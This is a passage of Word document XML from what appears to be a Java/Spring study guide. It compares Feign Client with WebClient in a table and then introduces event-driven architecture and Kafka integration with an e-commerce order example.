        <w:gridCol w:w="4138"/>
      </w:tblGrid>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="01CBADB9" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="046BE509"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A3E46BD"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Feign Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="022C8A8B"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WebClient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="1F991E04" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DD440A9"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52C19BE9"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ynchronous by default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68870A0A"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ynchronous and Asynchronous (Non-blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="6CAB2096" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50214702"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Ideal For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27AE037A"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Microservices communication (simple APIs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59C81A70"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Reactive, non-blocking applications or complex API calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="43131E15" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C0E1BE4"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Integration with Spring Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4450EE57"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trong integration (e.g., with Ribbon, Eureka)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FD46AD3"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No native integration, but works well in Spring WebFlux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="3763BE52" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F75E82A"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7958799B"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implifies HTTP calls in microservices (service-to-service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="523E3428"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calable, reactive, and customizable HTTP requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="494130DA" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="088916D3"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Customization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E3D57A0"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Limited customization (headers, timeouts, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="625746BA"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Full control over request, response, and error handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="622ABAEA" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64FBE885"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Error Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F14218A"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Automatic retry, circuit breaker with Hystrix (if used)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32578233"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Detailed error handling, with access to status codes and bodies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="617F4022" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C517B6D"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lastRenderedPageBreak/>
              <w:t>Learning Curve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CF8C4F5"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imple to use, minimal configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EA8EC54"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More complex to use, but more flexible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="7E0A8B9B" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69CC4EA9"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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DF2A254"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Less suitable for high concurrency, synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="404A50CC"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uitable for high concurrency, non-blocking operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="759AAFEB" w14:textId="77777777" w:rsidR="00FF6B93"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4623656">
          <v:rect id="_x0000_i2798" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5BB8E4"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When to Use Which?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD0D9AC"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Use Feign Client</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563B62F7"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When you are working with microservices and need simple, declarative HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F508282"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When you want Spring Cloud integration for features like service discovery (Eureka) and load balancing (Ribbon).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB9AD5"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If you prefer to abstract away HTTP request/response details and are okay with synchronous, blocking calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685F9C8B"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Use WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37055F0E"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When you are building a reactive application with high concurrency and need non-blocking calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641C7EC4"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When you need more control over HTTP requests, including custom headers, cookies, and body content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34380783"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When you need to handle asynchronous operations and work with Spring WebFlux for scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6484EC0D"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A60A927"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Feign Client</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is best suited for simple, declarative service-to-service communication, especially in microservices architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494635BA"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is better suited for reactive applications, non-blocking I/O, and when you need fine-grained control over the HTTP request/response lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25880460"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If you're building a traditional, synchronous microservices application, </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Feign</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is likely the best choice. If you're working with a more modern, reactive architecture that requires non-blocking calls and scalability, </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> would be the better option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA1E678" w14:textId="738DE506" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0011596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B5E1664">
          <v:rect id="_x0000_i2799" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09570B63" w14:textId="5EABAA7E" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00B07073">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="679" w:name="_Toc196308159"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Event-driven architecture and Kafka integration</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="679"/>
    </w:p>
    <w:p w14:paraId="15D476CE" w14:textId="7A7B5F13" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93" w:rsidP="008B3EF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Event-Driven Architecture and Kafka Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE84D8"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Event-driven architecture (EDA) is a software design paradigm in which the flow of the program is determined by events — essentially messages that signify some change of state or an occurrence in the system. In EDA, components of the application react to events and trigger actions accordingly, rather than calling other services directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9B1B4C"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Kafka, as a distributed event streaming platform, is one of the most popular tools to implement event-driven systems. Kafka provides a highly scalable, fault-tolerant, and performant way to produce and consume events/messages in real-time. It plays a key role in the communication layer of event-driven architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427321BA"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Key Concepts of Event-Driven Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E1C4CB"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Event Producers</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Components that generate events and push them to the event stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514792FC"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Event Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Components that listen to events from the event stream and take action based on the event data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DEB553"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Event Bus</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A messaging layer (e.g., Kafka) that allows communication between producers and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DEFA96"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Event Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sequences of events, often stored in topics, that are produced and consumed by different services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60400044"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Event Store</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A durable storage of event streams, where each event is stored and can be read by any service interested in that event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12571E40"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Kafka as an Event Streaming Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33304628"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Kafka is a distributed messaging system designed for high-throughput, low-latency messaging. It is ideal for handling large volumes of data in real-time, which makes it perfect for event-driven architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E003C41"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Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An application that sends events (messages) to Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A146DA4"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Consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An application that reads events from Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF193A"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Topics</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka organizes events into logical channels known as topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A378816"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Kafka Brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers handle the distribution of data across a Kafka cluster, ensuring high availability and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C6871"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Zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka relies on Zookeeper for managing and coordinating the Kafka cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEF9695"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Kafka ensures that the event-driven system can handle high volumes of events in a distributed manner and guarantees event delivery and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E70C2AB" w14:textId="77777777" w:rsidR="00FF6B93"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DADFDCC">
          <v:rect id="_x0000_i2800" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E91394"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Kafka Integration in Event-Driven Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A0FF89"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Event Producers (Publishing Events)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497824D4"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lastRenderedPageBreak/>
        <w:t>In EDA, the service or application that generates the event (producer) sends the event message to a Kafka topic. This can be any change of state, such as "user created", "order placed", "payment completed", etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2129AEBC"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Producers send events asynchronously to Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57213458"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Kafka Topics</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE1E9D6"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Topics are logical channels where events are stored. Producers write to topics, and consumers read from topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D496BB"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A Kafka topic is essentially a stream of events that can be consumed by multiple consumers at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA72B32"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Event Consumers (Consuming Events)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E30FDE5"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The services that listen to events from Kafka are called consumers. A consumer subscribes to a Kafka topic and processes the event when it is produced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48892723"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Consumers can be independent and process events in real-time as they occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AF4799"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Asynchronous Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5AA946"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Kafka enables asynchronous communication between services. This allows services to operate independently and react to events when they are ready to handle them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041CC377"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This asynchronous nature decouples the services, making the system more scalable and resilient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E836865"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Decoupling with Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7248E56C"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In traditional architectures, services often communicate synchronously (e.g., via REST API calls), which tightly couples them together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71964E4D"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With Kafka, services communicate asynchronously via events. This allows for better scalability, fault tolerance, and resilience because the failure of one service does not directly affect others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E46D9BC" w14:textId="77777777" w:rsidR="00FF6B93"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6EE6044">
          <v:rect id="_x0000_i2801" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1BBB37"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Example Flow of Kafka Integration in Event-Driven Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EA167B"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Let's say you are building an </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>E-commerce platform</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and you want to integrate Kafka in an event-driven way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506D3CEE"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Step 1: Event Production (Producer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C764E9"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Order Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> generates an event every time a new order is placed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4176E815"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Event</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: "New Order Placed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B23244"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Topic</w:t>
      </w:r>
